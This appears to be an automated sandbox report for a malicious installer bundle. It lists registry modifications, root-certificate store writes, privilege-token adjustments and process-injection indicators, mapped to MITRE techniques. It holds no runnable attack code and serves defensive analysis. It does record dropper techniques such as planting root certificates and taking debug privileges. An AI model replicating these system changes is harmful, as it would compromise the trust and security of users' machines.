Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Yonatan.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "2E72A6E77B6A70F46845C8932F3B3E32"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	gpooe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	gpooe.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
9688	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs

pid	Process
8532	001.exe
7628	installer.exe
5664	gpooe.exe
9844	askinstall39.exe
10068	setup.exe
3736	request2.exe
3880	SunLabsPlayer.exe
3944	005.exe
4064	ifhwwyy.exe
1164	toolspab1.exe
7908	42a25820.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe

Suspicious behavior: MapViewOfSection 32 IoCs

pid	Process
7824	toolspab1.exe
7908	42a25820.exe
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found
1264	Process not Found
9724	explorer.exe
9724	explorer.exe
1264	Process not Found
1264	Process not Found
3552	explorer.exe
3552	explorer.exe
1264	Process not Found
1264	Process not Found
3720	explorer.exe
3720	explorer.exe
1264	Process not Found
1264	Process not Found
3716	explorer.exe
3716	explorer.exe
1264	Process not Found
1264	Process not Found
3948	explorer.exe
3948	explorer.exe
1264	Process not Found
1264	Process not Found
1812	explorer.exe
1812	explorer.exe
1264	Process not Found
1264	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1104	Cyshupaelaenu.exe
Token: SeRestorePrivilege	8484	msiexec.exe
Token: SeTakeOwnershipPrivilege	8484	msiexec.exe
Token: SeSecurityPrivilege	8484	msiexec.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe
Token: SeLockMemoryPrivilege	7628	installer.exe
Token: SeIncreaseQuotaPrivilege	7628	installer.exe
Token: SeMachineAccountPrivilege	7628	installer.exe
Token: SeTcbPrivilege	7628	installer.exe
Token: SeSecurityPrivilege	7628	installer.exe
Token: SeTakeOwnershipPrivilege	7628	installer.exe
Token: SeLoadDriverPrivilege	7628	installer.exe
Token: SeSystemProfilePrivilege	7628	installer.exe
Token: SeSystemtimePrivilege	7628	installer.exe
Token: SeProfSingleProcessPrivilege	7628	installer.exe
Token: SeIncBasePriorityPrivilege	7628	installer.exe
Token: SeCreatePagefilePrivilege	7628	installer.exe
Token: SeCreatePermanentPrivilege	7628	installer.exe
Token: SeBackupPrivilege	7628	installer.exe
Token: SeRestorePrivilege	7628	installer.exe
Token: SeShutdownPrivilege	7628	installer.exe
Token: SeDebugPrivilege	7628	installer.exe
Token: SeAuditPrivilege	7628	installer.exe
Token: SeSystemEnvironmentPrivilege	7628	installer.exe
Token: SeChangeNotifyPrivilege	7628	installer.exe
Token: SeRemoteShutdownPrivilege	7628	installer.exe
Token: SeUndockPrivilege	7628	installer.exe
Token: SeSyncAgentPrivilege	7628	installer.exe
Token: SeEnableDelegationPrivilege	7628	installer.exe
Token: SeManageVolumePrivilege	7628	installer.exe
Token: SeImpersonatePrivilege	7628	installer.exe
Token: SeCreateGlobalPrivilege	7628	installer.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe
Token: SeLockMemoryPrivilege	7628	installer.exe
Token: SeIncreaseQuotaPrivilege	7628	installer.exe
Token: SeMachineAccountPrivilege	7628	installer.exe
Token: SeTcbPrivilege	7628	installer.exe
Token: SeSecurityPrivilege	7628	installer.exe
Token: SeTakeOwnershipPrivilege	7628	installer.exe
Token: SeLoadDriverPrivilege	7628	installer.exe
Token: SeSystemProfilePrivilege	7628	installer.exe
Token: SeSystemtimePrivilege	7628	installer.exe
Token: SeProfSingleProcessPrivilege	7628	installer.exe
Token: SeIncBasePriorityPrivilege	7628	installer.exe
Token: SeCreatePagefilePrivilege	7628	installer.exe
Token: SeCreatePermanentPrivilege	7628	installer.exe
Token: SeBackupPrivilege	7628	installer.exe
Token: SeRestorePrivilege	7628	installer.exe
Token: SeShutdownPrivilege	7628	installer.exe
Token: SeDebugPrivilege	7628	installer.exe
Token: SeAuditPrivilege	7628	installer.exe
Token: SeSystemEnvironmentPrivilege	7628	installer.exe
Token: SeChangeNotifyPrivilege	7628	installer.exe
